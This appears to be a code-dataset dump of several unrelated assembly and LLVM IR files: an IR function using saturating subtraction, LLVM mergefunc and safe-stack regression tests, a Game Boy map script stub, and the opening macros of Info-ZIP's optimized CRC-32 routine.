%b7 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 7 ), align 1
%b8 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 8 ), align 1
%b9 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 9 ), align 1
%b10 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 10), align 1
%b11 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 11), align 1
%b12 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 12), align 1
%b13 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 13), align 1
%b14 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 14), align 1
%b15 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 15), align 1
%b16 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 16), align 1
%b17 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 17), align 1
%b18 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 18), align 1
%b19 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 19), align 1
%b20 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 20), align 1
%b21 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 21), align 1
%b22 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 22), align 1
%b23 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 23), align 1
%b24 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 24), align 1
%b25 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 25), align 1
%b26 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 26), align 1
%b27 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 27), align 1
%b28 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 28), align 1
%b29 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 29), align 1
%b30 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 30), align 1
%b31 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 31), align 1
%b32 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 32), align 1
%b33 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 33), align 1
%b34 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 34), align 1
%b35 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 35), align 1
%b36 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 36), align 1
%b37 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 37), align 1
%b38 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 38), align 1
%b39 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 39), align 1
%b40 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 40), align 1
%b41 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 41), align 1
%b42 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 42), align 1
%b43 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 43), align 1
%b44 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 44), align 1
%b45 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 45), align 1
%b46 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 46), align 1
%b47 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 47), align 1
%b48 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 48), align 1
%b49 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 49), align 1
%b50 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 50), align 1
%b51 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 51), align 1
%b52 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 52), align 1
%b53 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 53), align 1
%b54 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 54), align 1
%b55 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 55), align 1
%b56 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 56), align 1
%b57 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 57), align 1
%b58 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 58), align 1
%b59 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 59), align 1
%b60 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 60), align 1
%b61 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 61), align 1
%b62 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 62), align 1
%b63 = load i8, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @b8, i32 0, i64 63), align 1
%r0 = call i8 @llvm.ssub.sat.i8(i8 %a0 , i8 %b0 )
%r1 = call i8 @llvm.ssub.sat.i8(i8 %a1 , i8 %b1 )
%r2 = call i8 @llvm.ssub.sat.i8(i8 %a2 , i8 %b2 )
%r3 = call i8 @llvm.ssub.sat.i8(i8 %a3 , i8 %b3 )
%r4 = call i8 @llvm.ssub.sat.i8(i8 %a4 , i8 %b4 )
%r5 = call i8 @llvm.ssub.sat.i8(i8 %a5 , i8 %b5 )
%r6 = call i8 @llvm.ssub.sat.i8(i8 %a6 , i8 %b6 )
%r7 = call i8 @llvm.ssub.sat.i8(i8 %a7 , i8 %b7 )
%r8 = call i8 @llvm.ssub.sat.i8(i8 %a8 , i8 %b8 )
%r9 = call i8 @llvm.ssub.sat.i8(i8 %a9 , i8 %b9 )
%r10 = call i8 @llvm.ssub.sat.i8(i8 %a10, i8 %b10)
%r11 = call i8 @llvm.ssub.sat.i8(i8 %a11, i8 %b11)
%r12 = call i8 @llvm.ssub.sat.i8(i8 %a12, i8 %b12)
%r13 = call i8 @llvm.ssub.sat.i8(i8 %a13, i8 %b13)
%r14 = call i8 @llvm.ssub.sat.i8(i8 %a14, i8 %b14)
%r15 = call i8 @llvm.ssub.sat.i8(i8 %a15, i8 %b15)
%r16 = call i8 @llvm.ssub.sat.i8(i8 %a16, i8 %b16)
%r17 = call i8 @llvm.ssub.sat.i8(i8 %a17, i8 %b17)
%r18 = call i8 @llvm.ssub.sat.i8(i8 %a18, i8 %b18)
%r19 = call i8 @llvm.ssub.sat.i8(i8 %a19, i8 %b19)
%r20 = call i8 @llvm.ssub.sat.i8(i8 %a20, i8 %b20)
%r21 = call i8 @llvm.ssub.sat.i8(i8 %a21, i8 %b21)
%r22 = call i8 @llvm.ssub.sat.i8(i8 %a22, i8 %b22)
%r23 = call i8 @llvm.ssub.sat.i8(i8 %a23, i8 %b23)
%r24 = call i8 @llvm.ssub.sat.i8(i8 %a24, i8 %b24)
%r25 = call i8 @llvm.ssub.sat.i8(i8 %a25, i8 %b25)
%r26 = call i8 @llvm.ssub.sat.i8(i8 %a26, i8 %b26)
%r27 = call i8 @llvm.ssub.sat.i8(i8 %a27, i8 %b27)
%r28 = call i8 @llvm.ssub.sat.i8(i8 %a28, i8 %b28)
%r29 = call i8 @llvm.ssub.sat.i8(i8 %a29, i8 %b29)
%r30 = call i8 @llvm.ssub.sat.i8(i8 %a30, i8 %b30)
%r31 = call i8 @llvm.ssub.sat.i8(i8 %a31, i8 %b31)
%r32 = call i8 @llvm.ssub.sat.i8(i8 %a32, i8 %b32)
%r33 = call i8 @llvm.ssub.sat.i8(i8 %a33, i8 %b33)
%r34 = call i8 @llvm.ssub.sat.i8(i8 %a34, i8 %b34)
%r35 = call i8 @llvm.ssub.sat.i8(i8 %a35, i8 %b35)
%r36 = call i8 @llvm.ssub.sat.i8(i8 %a36, i8 %b36)
%r37 = call i8 @llvm.ssub.sat.i8(i8 %a37, i8 %b37)
%r38 = call i8 @llvm.ssub.sat.i8(i8 %a38, i8 %b38)
%r39 = call i8 @llvm.ssub.sat.i8(i8 %a39, i8 %b39)
%r40 = call i8 @llvm.ssub.sat.i8(i8 %a40, i8 %b40)
%r41 = call i8 @llvm.ssub.sat.i8(i8 %a41, i8 %b41)
%r42 = call i8 @llvm.ssub.sat.i8(i8 %a42, i8 %b42)
%r43 = call i8 @llvm.ssub.sat.i8(i8 %a43, i8 %b43)
%r44 = call i8 @llvm.ssub.sat.i8(i8 %a44, i8 %b44)
%r45 = call i8 @llvm.ssub.sat.i8(i8 %a45, i8 %b45)
%r46 = call i8 @llvm.ssub.sat.i8(i8 %a46, i8 %b46)
%r47 = call i8 @llvm.ssub.sat.i8(i8 %a47, i8 %b47)
%r48 = call i8 @llvm.ssub.sat.i8(i8 %a48, i8 %b48)
%r49 = call i8 @llvm.ssub.sat.i8(i8 %a49, i8 %b49)
%r50 = call i8 @llvm.ssub.sat.i8(i8 %a50, i8 %b50)
%r51 = call i8 @llvm.ssub.sat.i8(i8 %a51, i8 %b51)
%r52 = call i8 @llvm.ssub.sat.i8(i8 %a52, i8 %b52)
%r53 = call i8 @llvm.ssub.sat.i8(i8 %a53, i8 %b53)
%r54 = call i8 @llvm.ssub.sat.i8(i8 %a54, i8 %b54)
%r55 = call i8 @llvm.ssub.sat.i8(i8 %a55, i8 %b55)
%r56 = call i8 @llvm.ssub.sat.i8(i8 %a56, i8 %b56)
%r57 = call i8 @llvm.ssub.sat.i8(i8 %a57, i8 %b57)
%r58 = call i8 @llvm.ssub.sat.i8(i8 %a58, i8 %b58)
%r59 = call i8 @llvm.ssub.sat.i8(i8 %a59, i8 %b59)
%r60 = call i8 @llvm.ssub.sat.i8(i8 %a60, i8 %b60)
%r61 = call i8 @llvm.ssub.sat.i8(i8 %a61, i8 %b61)
%r62 = call i8 @llvm.ssub.sat.i8(i8 %a62, i8 %b62)
%r63 = call i8 @llvm.ssub.sat.i8(i8 %a63, i8 %b63)
store i8 %r0 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 0 ), align 1
store i8 %r1 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 1 ), align 1
store i8 %r2 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 2 ), align 1
store i8 %r3 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 3 ), align 1
store i8 %r4 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 4 ), align 1
store i8 %r5 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 5 ), align 1
store i8 %r6 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 6 ), align 1
store i8 %r7 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 7 ), align 1
store i8 %r8 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 8 ), align 1
store i8 %r9 , i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 9 ), align 1
store i8 %r10, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 10), align 1
store i8 %r11, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 11), align 1
store i8 %r12, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 12), align 1
store i8 %r13, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 13), align 1
store i8 %r14, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 14), align 1
store i8 %r15, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 15), align 1
store i8 %r16, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 16), align 1
store i8 %r17, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 17), align 1
store i8 %r18, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 18), align 1
store i8 %r19, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 19), align 1
store i8 %r20, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 20), align 1
store i8 %r21, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 21), align 1
store i8 %r22, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 22), align 1
store i8 %r23, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 23), align 1
store i8 %r24, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 24), align 1
store i8 %r25, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 25), align 1
store i8 %r26, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 26), align 1
store i8 %r27, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 27), align 1
store i8 %r28, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 28), align 1
store i8 %r29, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 29), align 1
store i8 %r30, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 30), align 1
store i8 %r31, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 31), align 1
store i8 %r32, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 32), align 1
store i8 %r33, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 33), align 1
store i8 %r34, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 34), align 1
store i8 %r35, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 35), align 1
store i8 %r36, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 36), align 1
store i8 %r37, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 37), align 1
store i8 %r38, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 38), align 1
store i8 %r39, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 39), align 1
store i8 %r40, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 40), align 1
store i8 %r41, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 41), align 1
store i8 %r42, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 42), align 1
store i8 %r43, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 43), align 1
store i8 %r44, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 44), align 1
store i8 %r45, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 45), align 1
store i8 %r46, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 46), align 1
store i8 %r47, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 47), align 1
store i8 %r48, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 48), align 1
store i8 %r49, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 49), align 1
store i8 %r50, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 50), align 1
store i8 %r51, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 51), align 1
store i8 %r52, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 52), align 1
store i8 %r53, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 53), align 1
store i8 %r54, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 54), align 1
store i8 %r55, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 55), align 1
store i8 %r56, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 56), align 1
store i8 %r57, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 57), align 1
store i8 %r58, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 58), align 1
store i8 %r59, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 59), align 1
store i8 %r60, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 60), align 1
store i8 %r61, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 61), align 1
store i8 %r62, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 62), align 1
store i8 %r63, i8* getelementptr inbounds ([64 x i8], [64 x i8]* @c8, i32 0, i64 63), align 1
ret void
}
| {
"language": "Assembly"
} |
; RUN: opt -mergefunc -S < %s | FileCheck %s
; This test makes sure that the mergefunc pass uses extractvalue and
; insertvalue to convert the struct result type, as struct types cannot
; be bitcast directly.
target datalayout = "e-m:w-p:32:32-i64:64-f80:32-n8:16:32-S32"
; Two structurally identical pair types that differ only in pointee type;
; mergefunc should fold @fn2 into a thunk that tail-calls @fn1 and
; converts the result field-by-field.
%kv1 = type { i32*, i32* }
%kv2 = type { i8*, i8* }
; Opaque external call: keeps the function bodies non-trivial so they are
; merged rather than simplified away.
declare void @noop()
define %kv1 @fn1() {
; CHECK-LABEL: @fn1(
%tmp = alloca %kv1
%v1 = getelementptr %kv1, %kv1* %tmp, i32 0, i32 0
store i32* null, i32** %v1
%v2 = getelementptr %kv1, %kv1* %tmp, i32 0, i32 0
store i32* null, i32** %v2
call void @noop()
%v3 = load %kv1, %kv1* %tmp
ret %kv1 %v3
}
; Same body as @fn1 modulo types; the CHECK lines pin the expected thunk:
; call the survivor, extract each field, bitcast it, and rebuild the
; %kv2 aggregate with insertvalue.
define %kv2 @fn2() {
; CHECK-LABEL: @fn2(
; CHECK: %1 = tail call %kv1 @fn1()
; CHECK: %2 = extractvalue %kv1 %1, 0
; CHECK: %3 = bitcast i32* %2 to i8*
; CHECK: %4 = insertvalue %kv2 undef, i8* %3, 0
%tmp = alloca %kv2
%v1 = getelementptr %kv2, %kv2* %tmp, i32 0, i32 0
store i8* null, i8** %v1
%v2 = getelementptr %kv2, %kv2* %tmp, i32 0, i32 0
store i8* null, i8** %v2
call void @noop()
%v3 = load %kv2, %kv2* %tmp
ret %kv2 %v3
}
| {
"language": "Assembly"
} |
INCLUDE "constants.asm"
; ROMX: banked ROM section; the section name mirrors the source path.
SECTION "scripts/BaadonRoute2.asm", ROMX
; Map script entry point for Baadon Route 2. This map has no per-frame
; scripting, so the loader returns immediately.
BaadonRoute2_ScriptLoader::
ret
; "@" sentinel terminates the script data block for the engine's parser.
db "@"
| {
"language": "Assembly"
} |
; RUN: opt -safe-stack -S -mtriple=i386-pc-linux-gnu < %s -o - | FileCheck %s
; RUN: opt -safe-stack -S -mtriple=x86_64-pc-linux-gnu < %s -o - | FileCheck %s
%struct.pair = type { i32, i32 }
@.str = private unnamed_addr constant [4 x i8] c"%s\0A\00", align 1
; Addr-of a struct element passed into an invoke instruction.
; (GEP followed by an invoke)
; safestack attribute
; Requires protector.
; Because the address of %c escapes via the invoke, SafeStack must move
; the alloca to the unsafe stack; the CHECK below pins that by requiring
; a reference to the unsafe-stack pointer.
define i32 @foo() uwtable safestack personality i8* bitcast (i32 (...)* @__gxx_personality_v0 to i8*) {
entry:
; CHECK: __safestack_unsafe_stack_ptr
%c = alloca %struct.pair, align 4
%exn.slot = alloca i8*
%ehselector.slot = alloca i32
%a = getelementptr inbounds %struct.pair, %struct.pair* %c, i32 0, i32 0
store i32 0, i32* %a, align 4
%a1 = getelementptr inbounds %struct.pair, %struct.pair* %c, i32 0, i32 0
invoke void @_Z3exceptPi(i32* %a1)
to label %invoke.cont unwind label %lpad
invoke.cont:
ret i32 0
; Landing pad for the invoke; catches everything and returns normally.
lpad:
%0 = landingpad { i8*, i32 }
catch i8* null
ret i32 0
}
declare void @_Z3exceptPi(i32*)
declare i32 @__gxx_personality_v0(...)
| {
"language": "Assembly"
} |
;===========================================================================
; Copyright (c) 1990-2007 Info-ZIP. All rights reserved.
;
; See the accompanying file LICENSE, version 2000-Apr-09 or later
; (the contents of which are also included in zip.h) for terms of use.
; If, for some reason, all these files are missing, the Info-ZIP license
; also may be found at: ftp://ftp.info-zip.org/pub/infozip/license.html
;===========================================================================
; crc_i386.asm, optimized CRC calculation function for Zip and UnZip,
; created by Paul Kienitz and Christian Spieler. Last revised 07 Jan 2007.
;
; Revised 06-Oct-96, Scott Field ([email protected])
; fixed to assemble with masm by not using .model directive which makes
; assumptions about segment alignment. Also,
; avoid using loop, and j[e]cxz where possible. Use mov + inc, rather
; than lodsb, and other misc. changes resulting in the following performance
; increases:
;
; unrolled loops NO_UNROLLED_LOOPS
; *8 >8 <8 *8 >8 <8
;
; +54% +42% +35% +82% +52% +25%
;
; first item in each table is input buffer length, even multiple of 8
; second item in each table is input buffer length, > 8
; third item in each table is input buffer length, < 8
;
; Revised 02-Apr-97, Chr. Spieler, based on Rodney Brown ([email protected])
; Incorporated Rodney Brown's 32-bit-reads optimization as found in the
; UNIX AS source crc_i386.S. This new code can be disabled by defining
; the macro symbol NO_32_BIT_LOADS.
;
; Revised 12-Oct-97, Chr. Spieler, based on Rodney Brown ([email protected])
; Incorporated Rodney Brown's additional tweaks for 32-bit-optimized CPUs
; (like the Pentium Pro, Pentium II, and probably some Pentium clones).
; This optimization is controlled by the macro symbol __686 and is disabled
; by default. (This default is based on the assumption that most users
; do not yet work on a Pentium Pro or Pentium II machine ...)
;
; Revised 25-Mar-98, Cosmin Truta ([email protected])
; Working without .model directive caused tasm32 version 5.0 to produce
; bad object code. The optimized alignments can be optionally disabled
; by defining NO_ALIGN, thus allowing to use .model flat. There is no need
; to define this macro if using other versions of tasm.
;
; Revised 16-Jan-2005, Cosmin Truta ([email protected])
; Enabled the 686 build by default, because there are hardly any pre-686 CPUs
; in serious use nowadays. (See the 12-Oct-97 note above.)
;
; Revised 03-Jan-2006, Chr. Spieler
; Enlarged unrolling loops to "do 16 bytes per turn"; optimized access to
; data buffer in loop body (adjust pointer only once in loop body and use
; offsets to access each item); added additional support for the "unfolded
; tables" optimization variant (enabled by IZ_CRCOPTIM_UNFOLDTBL).
;
; Revised 07-Jan-2007, Chr. Spieler
; Recognize additional conditional flag CRC_TABLE_ONLY that prevents
; compilation of the crc32() function.
;
; FLAT memory model assumed.
;
; Loop unrolling can be disabled by defining the macro NO_UNROLLED_LOOPS.
; This results in shorter code at the expense of reduced performance.
;
;==============================================================================
;
; Do NOT assemble this source if external crc32 routine from zlib gets used,
; or only the precomputed CRC_32_Table is needed.
;
; Whole module is compiled out when zlib's crc32 is used instead, or when
; only the precomputed table is wanted.
IFNDEF USE_ZLIB
IFNDEF CRC_TABLE_ONLY
;
.386p
name crc_i386
IFDEF NO_ALIGN
.model flat
ENDIF
; Default build target: 686-class optimization unless PRE_686 is defined.
IFNDEF PRE_686
IFNDEF __686
__686 EQU 1 ; optimize for Pentium Pro, Pentium II and compatible CPUs
ENDIF
ENDIF
extrn _get_crc_table:near ; ZCONST ulg near *get_crc_table(void);
;
IFNDEF NO_STD_STACKFRAME
; Use a `standard' stack frame setup on routine entry and exit.
; Actually, this option is set as default, because it results
; in smaller code !!
STD_ENTRY MACRO
push ebp
mov ebp,esp
ENDM
; Args addressed via ebp: return addr at [ebp+4], so Arg1 starts at +8.
Arg1 EQU 08H[ebp]
Arg2 EQU 0CH[ebp]
Arg3 EQU 10H[ebp]
STD_LEAVE MACRO
pop ebp
ENDM
ELSE ; NO_STD_STACKFRAME
STD_ENTRY MACRO
ENDM
; Frameless variant: offsets from esp account for the 5 registers pushed
; in the _crc32 prologue (5*4 = 20 bytes) plus the 4-byte return address,
; so Arg1 lives at esp+24 (= 18H).
Arg1 EQU 18H[esp]
Arg2 EQU 1CH[esp]
Arg3 EQU 20H[esp]
STD_LEAVE MACRO
ENDM
ENDIF ; ?NO_STD_STACKFRAME
; These two (three) macros make up the loop body of the CRC32 cruncher.
; registers modified:
; eax : crc value "c"
; esi : pointer to next data byte (or dword) "buf++"
; registers read:
; edi : pointer to base of crc_table array
; scratch registers:
; ebx : index into crc_table array
; (requires upper three bytes = 0 when __686 is undefined)
IFNDEF __686 ; optimize for 386, 486, Pentium
; Pre-686 form: partial-register write to bl (cheap on these CPUs); relies
; on the caller having zeroed ebx so the bl write yields a clean dword index.
Do_CRC MACRO
mov bl,al ; tmp = c & 0xFF
shr eax,8 ; c = (c >> 8)
xor eax,[edi+ebx*4] ; ^ table[tmp]
ENDM
ELSE ; __686 : optimize for Pentium Pro, Pentium II and compatible CPUs
; 686 form: movzx avoids the partial-register stall of writing bl.
Do_CRC MACRO
movzx ebx,al ; tmp = c & 0xFF
shr eax,8 ; c = (c >> 8)
xor eax,[edi+ebx*4] ; ^ table[tmp]
ENDM
ENDIF ; ?__686
Do_CRC_byte MACRO
xor al, byte ptr [esi] ; c ^= *buf
inc esi ; buf++
Do_CRC ; c = (c >> 8) ^ table[c & 0xFF]
ENDM
; Same as Do_CRC_byte but reads at a fixed offset and leaves esi alone;
; the unrolled loop adjusts the pointer once per 16 bytes instead.
Do_CRC_byteof MACRO ofs
xor al, byte ptr [esi+ofs] ; c ^= *(buf+ofs)
Do_CRC ; c = (c >> 8) ^ table[c & 0xFF]
ENDM
IFNDEF NO_32_BIT_LOADS
IFDEF IZ_CRCOPTIM_UNFOLDTBL
; "Unfolded tables" variant: uses four 256-entry tables laid out back to
; back (byte offsets 0, 1024, 2048, 3072) to process a whole dword with
; independent lookups. edx becomes a scratch register here, so the saved
; length must live in the Arg3 stack slot instead.
; the edx register is needed in crc calculation
SavLen EQU Arg3
UpdCRC_dword MACRO
movzx ebx,al ; tmp = c & 0xFF
mov edx,[edi+ebx*4+3072] ; table[256*3+tmp]
movzx ebx,ah ; tmp = (c>>8) & 0xFF
shr eax,16 ;
xor edx,[edi+ebx*4+2048] ; ^ table[256*2+tmp]
movzx ebx,al ; tmp = (c>>16) & 0xFF
shr eax,8 ; tmp = (c>>24)
xor edx,[edi+ebx*4+1024] ; ^ table[256*1+tmp]
mov eax,[edi+eax*4] ; ^ table[256*0+tmp]
xor eax,edx ; ..
ENDM
; As UpdCRC_dword, plus the buffer-pointer advance interleaved mid-macro
; so the add overlaps with the table loads.
UpdCRC_dword_sh MACRO dwPtrIncr
movzx ebx,al ; tmp = c & 0xFF
mov edx,[edi+ebx*4+3072] ; table[256*3+tmp]
movzx ebx,ah ; tmp = (c>>8) & 0xFF
xor edx,[edi+ebx*4+2048] ; ^ table[256*2+tmp]
shr eax,16 ;
movzx ebx,al ; tmp = (c>>16) & 0xFF
add esi, 4*dwPtrIncr ; ((ulg *)buf) += dwPtrIncr
shr eax,8 ; tmp = (c>>24)
xor edx,[edi+ebx*4+1024] ; ^ table[256*1+tmp]
mov eax,[edi+eax*4] ; ^ table[256*0+tmp]
xor eax,edx ; ..
ENDM
ELSE ; IZ_CRCOPTIM_UNFOLDTBL
; Single-table variant: a dword is just four chained byte steps, and edx
; is free to hold the saved length in a register.
; the edx register is not needed anywhere else
SavLen EQU edx
UpdCRC_dword MACRO
Do_CRC
Do_CRC
Do_CRC
Do_CRC
ENDM
UpdCRC_dword_sh MACRO dwPtrIncr
Do_CRC
Do_CRC
add esi, 4*dwPtrIncr ; ((ulg *)buf) += dwPtrIncr
Do_CRC
Do_CRC
ENDM
ENDIF ; ?IZ_CRCOPTIM_UNFOLDTBL
Do_CRC_dword MACRO
xor eax, dword ptr [esi] ; c ^= *(ulg *)buf
UpdCRC_dword_sh 1 ; ... ((ulg *)buf)++
ENDM
; Process 16 bytes (4 dwords) per invocation; only the final step moves esi.
Do_CRC_4dword MACRO
xor eax, dword ptr [esi] ; c ^= *(ulg *)buf
UpdCRC_dword
xor eax, dword ptr [esi+4] ; c ^= *((ulg *)buf+1)
UpdCRC_dword
xor eax, dword ptr [esi+8] ; c ^= *((ulg *)buf+2)
UpdCRC_dword
xor eax, dword ptr [esi+12] ; c ^= *((ulg *)buf]+3
UpdCRC_dword_sh 4 ; ... ((ulg *)buf)+=4
ENDM
ENDIF ; !NO_32_BIT_LOADS
IFNDEF NO_ALIGN
_TEXT segment use32 para public 'CODE'
ELSE
_TEXT segment use32
ENDIF
